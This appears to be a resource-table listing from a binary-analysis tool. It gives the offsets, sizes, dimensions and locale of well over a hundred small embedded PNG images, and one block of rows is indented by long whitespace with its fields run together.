PNG | 0x36b048 | 0x91 | PNG image data, 9 x 8, 8-bit/color RGB, non-interlaced | English | United States | 1.006896551724138
PNG | 0x36b0e0 | 0x7d | PNG image data, 15 x 3, 8-bit/color RGB, non-interlaced | English | United States | 1.008
PNG | 0x3816e0 | 0xa6 | PNG image data, 7 x 7, 8-bit/color RGB, non-interlaced | English | United States | 1.0120481927710843
PNG | 0x381620 | 0xbc | PNG image data, 7 x 7, 8-bit/color RGBA, non-interlaced | English | United States | 1.0159574468085106
PNG | 0x37c5d8 | 0xa07 | PNG image data, 13 x 156, 8-bit/color RGBA, non-interlaced | English | United States | 1.004285157771718
PNG | 0x374018 | 0x1de1 | PNG image data, 52 x 336, 8-bit/color RGBA, non-interlaced | English | United States | 1.0014380964832004
PNG | 0x375e00 | 0x1be | PNG image data, 38 x 38, 8-bit/color RGBA, non-interlaced | English | United States | 1.0246636771300448
PNG | 0x375fc0 | 0x53b | PNG image data, 30 x 16, 8-bit/color RGBA, non-interlaced | English | United States | 1.0082150858849888
PNG | 0x3811e0 | 0x440 | PNG image data, 22 x 66, 8-bit/color RGBA, non-interlaced | English | United States | 1.010110294117647
PNG | 0x37d468 | 0x12e | PNG image data, 20 x 12, 8-bit/color RGBA, non-interlaced | English | United States | 1.0298013245033113
PNG | 0x37aa70 | 0x5b1 | PNG image data, 23 x 154, 8-bit/color RGBA, non-interlaced | English | United States | 1.0075497597803706
PNG | 0x37b028 | 0x408 | PNG image data, 9 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0106589147286822
PNG | 0x37bca8 | 0x471 | PNG image data, 23 x 154, 8-bit/color RGBA, non-interlaced | English | United States | 1.009674582233949
PNG | 0x37c120 | 0x4b7 | PNG image data, 10 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0091135045567523
PNG | 0x37b430 | 0x481 | PNG image data, 23 x 154, 8-bit/color RGBA, non-interlaced | English | United States | 1.0095403295750216
PNG | 0x37b8b8 | 0x3ec | PNG image data, 9 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0109561752988048
PNG | 0x36e130 | 0x452 | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0099457504520795
PNG | 0x36e928 | 0x414 | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.010536398467433
PNG | 0x36e588 | 0x39e | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.011879049676026
PNG | 0x36ed40 | 0x48d | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.009442060085837
PNG | 0x372290 | 0x1b3 | PNG image data, 15 x 56, 8-bit/color RGBA, non-interlaced | English | United States | 1.025287356321839
PNG | 0x372448 | 0xea | PNG image data, 32 x 8, 8-bit/color RGBA, non-interlaced | English | United States | 1.0299145299145298
PNG | 0x372538 | 0x1ae0 | PNG image data, 38 x 114, 8-bit/color RGBA, non-interlaced | English | United States | 1.0015988372093023
PNG | 0x376ef0 | 0xb43 | PNG image data, 22 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0038154699965314
PNG | 0x377a38 | 0x609 | PNG image data, 11 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0071197411003237
PNG | 0x378048 | 0x18ae | PNG image data, 43 x 234, 8-bit/color RGBA, non-interlaced | English | United States | 1.0017410572966128
PNG | 0x3798f8 | 0x1177 | PNG image data, 43 x 135, 8-bit/color RGBA, non-interlaced | English | United States | 1.0024602997092373
PNG | 0x36fca0 | 0x25ec | PNG image data, 43 x 330, 8-bit/color RGBA, non-interlaced | English | United States | 1.0011330861145447
PNG | 0x36f1d0 | 0xacb | PNG image data, 22 x 88, 8-bit/color RGBA, non-interlaced | English | United States | 1.0039811798769454
PNG | 0x381830 | 0xbc8 | PNG image data, 14 x 276, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036472148541113
PNG | 0x3823f8 | 0xc2e | PNG image data, 14 x 276, 8-bit/color RGBA, non-interlaced | English | United States | 1.0035279025016035
PNG | 0x37e240 | 0x5dd | PNG image data, 15 x 80, 8-bit/color RGBA, non-interlaced | English | United States | 1.0073284477015323
PNG | 0x37dca8 | 0x597 | PNG image data, 15 x 76, 8-bit/color RGBA, non-interlaced | English | United States | 1.0076869322152342
PNG | 0x37d6b0 | 0x5f8 | PNG image data, 15 x 84, 8-bit/color RGBA, non-interlaced | English | United States | 1.007198952879581
PNG | 0x37d230 | 0x237 | PNG image data, 54 x 69, 8-bit/color RGBA, non-interlaced | English | United States | 1.0194003527336861
PNG | 0x37e820 | 0x588 | PNG image data, 22 x 44, 8-bit/color RGBA, non-interlaced | English | United States | 1.0077683615819208
PNG | 0x376500 | 0x4b6 | PNG image data, 64 x 26, 8-bit/color RGBA, non-interlaced | English | United States | 1.0091210613598673
PNG | 0x3769b8 | 0x532 | PNG image data, 64 x 26, 8-bit/color RGBA, non-interlaced | English | United States | 1.0082706766917293
PNG | 0x36c7c8 | 0x5fe | PNG image data, 80 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0071707953063884
PNG | 0x36cdc8 | 0xdd3 | PNG image data, 57 x 120, 8-bit/color RGBA, non-interlaced | English | United States | 0.9960440802486578
PNG | 0x36dba0 | 0x7c | PNG image data, 1 x 23, 8-bit/color RGBA, non-interlaced | English | United States | 0.9919354838709677
PNG | 0x38ea08 | 0x13c1 | PNG image data, 52 x 252, 8-bit/color RGBA, non-interlaced | English | United States | 1.0021752026893416
PNG | 0x3913c8 | 0x37d | PNG image data, 80 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0123180291153415
PNG | 0x391030 | 0x395 | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.0119956379498365
PNG | 0x38fdd0 | 0x125e | PNG image data, 57 x 120, 8-bit/color RGBA, non-interlaced | English | United States | 1.0023394300297745
PNG | 0x38bbf0 | 0x13b4 | PNG image data, 52 x 252, 8-bit/color RGBA, non-interlaced | English | United States | 1.0021808088818398
PNG | 0x38e698 | 0x369 | PNG image data, 80 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0126002290950744
PNG | 0x38e2c8 | 0x3cc | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.0113168724279835
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x38cfa80x1320PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002246732026144
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3917480x13acPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021842732327244
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3941300x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x393d700x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x392af80x1274PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023285351397122
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3863000x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x388c800x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3889280x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3876a00x1288PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002318718381113
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3830280x211PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0207939508506616
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3832400x2e4PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0148648648648648
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3836000x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x385f980x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x385c200x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3849b00x126bPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0023329798515377
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3835280xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3944980x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x396f300x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x396b380x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3958300x1304PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0022596548890714
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3890000x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x38b8780x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x38b5380x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x38a3980x119ePNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.002439024390244
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3817880xa6PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0120481927710843
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36df180x211PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0207939508506616
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36dc200x2f7PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37d0480x16ePNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.030054644808743
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37d1b80x73PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9826086956521739
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37d5980x117PNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021505376344086
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37cfe00x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3803b00xcePNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0242718446601942
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3807a00xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3804800x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3807080x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37fa400x96aPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.004564315352697
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37f0a00x99bPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0044733631557543
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x37eda80x2f7PNG image data, 11 x 45, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0144927536231885
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x367ff80x1ffPNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0215264187866928
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3681f80x1f7PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.021868787276342
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3684880xb6PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States1.010989010989011
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3683f00x94PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0135135135135136
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3685400x3e6PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0110220440881763
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3689280x3e6PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0110220440881763
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x368d100x315PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0139416983523448
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3690280x259PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0183028286189684
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3694880x205PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0212765957446808
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3696900x176PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0294117647058822
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3692880x124PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136986301369864
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3693b00xd7PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3698080x28fPNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.016793893129771
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x369a980x225PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0200364298724955
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36b6d00xdd3PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9960440802486578
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36c4a80x123PNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0378006872852235
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x36b3600x10bPNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.0337078651685394
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c5f980x364PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012672811059908
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c5bd80x3baPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0115303983228512
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c4fd80xbffPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035818951481603
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3ba1600x139fPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021899263388414
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3bc4500x380PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0122767857142858
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3bc0f80x352PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0129411764705882
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3bb5000xbf8PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0035900783289817
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b74980x1e3PNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0227743271221532
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b76800x3d2PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0112474437627812
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b7b300x13adPNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021838395870557
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b9df80x365PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0126582278481013
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b9a800x374PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b8ee00xb9aPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0037037037037038
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b7a580xd4PNG image data, 3 x 26, 8-bit/color RGBA, non-interlacedEnglishUnited States1.028301886792453
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c63000x1394PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00219473264166
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c86f80x374PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.012443438914027
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c83000x3f4PNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0108695652173914
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3c76980xc62PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0034700315457412
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3bc7d00x1397PNG image data, 52 x 252, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0021934197407776
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3bea300x373PNG image data, 80 x 92, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124575311438277
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3be6f00x33dPNG image data, 80 x 19, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0132689987937273
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3bdb680xb84PNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0003392130257802
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b5e900xb1PNG image data, 15 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0169491525423728
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a21e80x1daPNG image data, 100 x 34, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0232067510548524
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a1e700x375PNG image data, 100 x 136, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0124293785310734
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b16000x1a5PNG image data, 9 x 38, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0261282660332542
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b17a80x71PNG image data, 5 x 5, 8-bit/color RGB, non-interlacedEnglishUnited States0.9911504424778761
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b1b680x11aPNG image data, 11 x 24, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0283687943262412
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b15980x67PNG image data, 2 x 55, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9902912621359223
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b49e80xe0PNG image data, 90 x 12, 8-bit/color RGBA, non-interlacedEnglishUnited States1.03125
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b4de80xa40PNG image data, 86 x 240, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9733231707317073
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b4ac80x283PNG image data, 86 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0171073094867806
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b4d500x93PNG image data, 5 x 8, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0136054421768708
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b40600x985PNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00451374640952
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b36900x9caPNG image data, 18 x 54, 8-bit/color RGBA, non-interlacedEnglishUnited States1.00438946528332
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3b33500x339PNG image data, 11 x 45, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0133333333333334
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39c2c00x214PNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0206766917293233
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39c4d80x22ePNG image data, 70 x 23, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0197132616487454
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39c7a00xb3PNG image data, 2 x 20, 8-bit/color RGB, non-interlacedEnglishUnited States1.011173184357542
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39c7080x95PNG image data, 11 x 11, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9932885906040269
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39c8580x414PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010536398467433
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39cc700x414PNG image data, 17 x 32, 8-bit/color RGBA, non-interlacedEnglishUnited States1.010536398467433
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d0880x1fbPNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0216962524654833
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d2880x179PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0159151193633953
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d5d00x179PNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0053050397877985
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d7500x114PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0289855072463767
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d4080x10ePNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.011111111111111
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d5180xb6PNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0054945054945055
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d8680x17ePNG image data, 17 x 80, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0287958115183247
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39d9e80x15cPNG image data, 13 x 60, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0201149425287357
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39f5a00xf6fPNG image data, 57 x 120, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0027841052898
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x3a05100x143PNG image data, 72 x 15, 8-bit/color RGB, non-interlacedEnglishUnited States1.0340557275541795
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39f2280x110PNG image data, 30 x 24, 8-bit/color RGB, non-interlacedEnglishUnited States1.0294117647058822
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39f1a00x87PNG image data, 35 x 3, 8-bit/color RGB, non-interlacedEnglishUnited States1.0074074074074073
                                                                                                                                                                                                                                                                                                                                                                                                                  PNG0x39eb000x13bPNG image data, 9 x 9, 8-bit/color RGB, non-interlacedEnglishUnited States1.0253968253968253
PNG | 0x39e658 | 0x4a1 | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.009282700421941
PNG | 0x3d0708 | 0x25e | PNG image data, 72 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.018151815181518
PNG | 0x3d04f0 | 0x79 | PNG image data, 4 x 4, 8-bit/color RGB, non-interlaced | English | United States | 0.9752066115702479
PNG | 0x3cd488 | 0x167 | PNG image data, 70 x 23, 8-bit/color RGBA, non-interlaced | English | United States | 0.9972144846796658
PNG | 0x3cd710 | 0x278 | PNG image data, 70 x 31, 8-bit/color RGBA, non-interlaced | English | United States | 1.0174050632911393
PNG | 0x3cd5f0 | 0x11a | PNG image data, 70 x 23, 8-bit/color RGBA, non-interlaced | English | United States | 0.9680851063829787
PNG | 0x3d0030 | 0xd4 | PNG image data, 22 x 38, 8-bit/color RGB, non-interlaced | English | United States | 1.0235849056603774
PNG | 0x3cf178 | 0x38d | PNG image data, 55 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.012101210121012
PNG | 0x3cf508 | 0x265 | PNG image data, 55 x 22, 8-bit/color RGBA, non-interlaced | English | United States | 1.0179445350734095
PNG | 0x3cf820 | 0x11a | PNG image data, 30 x 24, 8-bit/color RGBA, non-interlaced | English | United States | 1.0319148936170213
PNG | 0x3cf770 | 0xaa | PNG image data, 2 x 19, 8-bit/color RGB, non-interlaced | English | United States | 1.011764705882353
PNG | 0x3cf940 | 0x12a | PNG image data, 20 x 40, 8-bit/color RGBA, non-interlaced | English | United States | 1.0268456375838926
PNG | 0x3cef68 | 0x209 | PNG image data, 10 x 28, 8-bit/color RGB, non-interlaced | English | United States | 1.021113243761996
PNG | 0x3d03f8 | 0xf5 | PNG image data, 10 x 28, 8-bit/color RGB, non-interlaced | English | United States | 1.0244897959183674
PNG | 0x3d19c0 | 0xa6 | PNG image data, 54 x 31, 8-bit/color RGB, non-interlaced | English | United States | 1.0180722891566265
PNG | 0x3d1870 | 0x150 | PNG image data, 54 x 124, 8-bit/color RGB, non-interlaced | English | United States | 1.0327380952380953
PNG | 0x3d0108 | 0xac | PNG image data, 7 x 7, 8-bit/color RGBA, non-interlaced | English | United States | 1.0174418604651163
PNG | 0x3d01b8 | 0x8b | PNG image data, 3 x 11, 8-bit/color RGBA, non-interlaced | English | United States | 1.0
PNG | 0x3d0248 | 0x98 | PNG image data, 9 x 8, 8-bit/color RGB, non-interlaced | English | United States | 1.006578947368421
PNG | 0x3d02e0 | 0x91 | PNG image data, 9 x 8, 8-bit/color RGB, non-interlaced | English | United States | 1.006896551724138
PNG | 0x3d0378 | 0x7d | PNG image data, 15 x 3, 8-bit/color RGB, non-interlaced | English | United States | 1.008
PNG | 0x3e7840 | 0xa6 | PNG image data, 7 x 7, 8-bit/color RGB, non-interlaced | English | United States | 1.0120481927710843
PNG | 0x3e7780 | 0xbd | PNG image data, 7 x 7, 8-bit/color RGBA, non-interlaced | English | United States | 1.0105820105820107
PNG | 0x3e2780 | 0xa07 | PNG image data, 13 x 156, 8-bit/color RGBA, non-interlaced | English | United States | 1.004285157771718
PNG | 0x3d9d60 | 0x1de1 | PNG image data, 52 x 336, 8-bit/color RGBA, non-interlaced | English | United States | 1.0014380964832004
PNG | 0x3dbb48 | 0x1be | PNG image data, 38 x 38, 8-bit/color RGBA, non-interlaced | English | United States | 1.0246636771300448
PNG | 0x3dbd08 | 0x53b | PNG image data, 30 x 16, 8-bit/color RGBA, non-interlaced | English | United States | 1.0082150858849888
PNG | 0x3e7310 | 0x46c | PNG image data, 22 x 66, 8-bit/color RGBA, non-interlaced | English | United States | 1.0097173144876326
PNG | 0x3e3610 | 0xaf | PNG image data, 20 x 12, 8-bit/color RGBA, non-interlaced | English | United States | 1.0171428571428571
PNG | 0x3e0690 | 0x701 | PNG image data, 23 x 154, 8-bit/color RGBA, non-interlaced | English | United States | 1.0061349693251533
PNG | 0x3e0d98 | 0x498 | PNG image data, 9 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0093537414965987
PNG | 0x3e1c78 | 0x5c1 | PNG image data, 23 x 154, 8-bit/color RGBA, non-interlaced | English | United States | 1.0074677528852682
PNG | 0x3e2240 | 0x539 | PNG image data, 10 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0082273747195214
PNG | 0x3e1230 | 0x5c7 | PNG image data, 23 x 154, 8-bit/color RGBA, non-interlaced | English | United States | 1.0074374577417173
PNG | 0x3e17f8 | 0x47f | PNG image data, 9 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.009556907037359
PNG | 0x3d39a8 | 0x585 | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0077848549186128
PNG | 0x3d4418 | 0x546 | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0081481481481482
